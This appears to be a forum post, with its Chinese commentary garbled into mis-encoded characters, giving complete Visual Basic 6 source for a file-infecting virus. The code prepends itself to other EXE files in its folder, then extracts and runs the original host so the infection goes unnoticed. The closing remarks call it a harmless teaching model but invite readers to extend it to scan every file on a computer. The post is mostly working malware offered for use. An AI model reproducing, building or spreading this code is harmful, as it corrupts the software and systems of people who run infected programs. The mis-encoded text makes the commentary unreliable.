VBµÄÒ»¸ö¿ÉÒÔ¸ÐȾEXEµÄ²¡¶¾Ô­´úÂë

ʲô¿Ø¼þ¶¼²»Óüӣ¬Ö±½ÓÊäÈëÒÔÏ´úÂë¾ÍÐÐÁË¡£
Option Explicit
Private Victim As String 'Òª¸ÐȾµÄÎļþµÄÃû×Ö
Private HostLen As Long 'Òª¸ÐȾµÄÎļþµÄ´óС
Private vbArray() As Byte '²¡¶¾µÄ´úÂë
Private hArray() As Byte 'Òª¸ÐȾµÄÎļþµÄ´úÂë
Private lenght As Long
Private MySize As Integer '²¡¶¾µÄ´óС
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Sub form_Initialize()
Dim i As Long
On Error GoTo vbVerror '³ö´í´¦Àí
'Ô­Àí£º½«Éú³É²¡¶¾ÎļþµÄ´úÂë¶Á³ö£¬Õ³ÔÚÒª±»¸ÐȾµÄÎļþµÄºóÃæ¡£
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim MyArray(LOF(1) - 1)
MySize = LOF(1)
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1
'ÕâÊÇÔÚ¶Á×Ô¼ºµÄ´úÂë

Victim = Dir(App.Path & "\" & "*.EXE") 'Ëæ±ãÑ¡Ò»¸öÎļþ£¨Ä¿Ç°Ö»ÊÇÔÚ²¡¶¾ËùÔÚµÄĿ¼ÏÂËæ»úÑ¡Ò»¸ö£¬½«À´Äã¿ÉÒÔÐ޸ģ¬ÈÃËü²»¶ÏµÄÑ­»·ËÑË÷¼ÆËã»úÉϵÄËùÓÐÎļþ¡££©
While Victim <> ""
If format(Victim, ">") <> format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1
'¶Á³ö²¡¶¾×ÔÉíµÄ´úÂë

If hArray(&H69) <> &H4D Then
i = hArray(&H3C)
If hArray(i) = &H50 Then
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If 'Òª±£Ö¤±»¸ÐȾµÄ²»ÊÇ¿ÕÎļþ£¨²»ÊÇȦÌ×£©
End If
End If
'¶Á³ö×¼±¸±»¸ÐȾµÄÎļþµÄ´úÂë
Victim = Dir() 'Next
Wend
'ÏÂÃæµÄ¹¤×÷ÊÇΪÁ˱£Ö¤²¡¶¾²»»áÖظ´¸ÐȾһ¸öÎļþ£¬Ò²²»»á×ÔÎÒ¸ÐȾ¡£
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1
Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
Put #1, , vbArray
Close #1

idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill App.Path & "\" & App.EXEName & ".eve"
Else
Close #1
End If
End
vbVerror: '³ö´í´¦Àí£¬¿ÕמͿÉÒÔÁË
End Sub
[/hide]
'»¹ÓÐÆäËûµÄ˵Ã÷£º
'1¡¢±¾´úÂëÄ¿Ç°½öÊÇʵÑéÄ£ÐÍ£¬¸øÐÂÊÖ½²½âÔ­ÀíÖ®Ó㬲»»áʧ¿Ø£¬¾ø¶Ô°²È«¡£
'2¡¢±¾´úÂë½öʵÏÖÁ˸ÐȾEXEµÄ¹¦ÄÜ£¬ÆäËûµÄ¹¦ÄÜ»¹ÐëÄã×Ô¼º¼ÓÈë¡£
'3¡¢ÎªÁËÄ¿Ç°µÄ°²È«£¬±¾²¡¶¾Ö»ÊÇÔÚ²¡¶¾ËùÔÚµÄĿ¼ÏÂËæ»úÑ¡Ò»¸öÎļþ¸ÐȾ£¬Äã¿ÉÒÔÀûÓô˹¦ÄÜÀ´µ÷ÊÔ£»½«À´Äã¿ÉÒÔÐ޸ģ¬ÈÃËü²»¶ÏµÄÑ­»·ËÑË÷¼ÆËã»úÉϵÄËùÓÐÎļþ¡£
'4¡¢×îÖØÒªµÄ£º²»Òª¸ã¶ñÒâÆÆ»µ£¬·ñÔòÕæ½øÁ˼àÓüºó¹û×Ô¸º£¡[/color]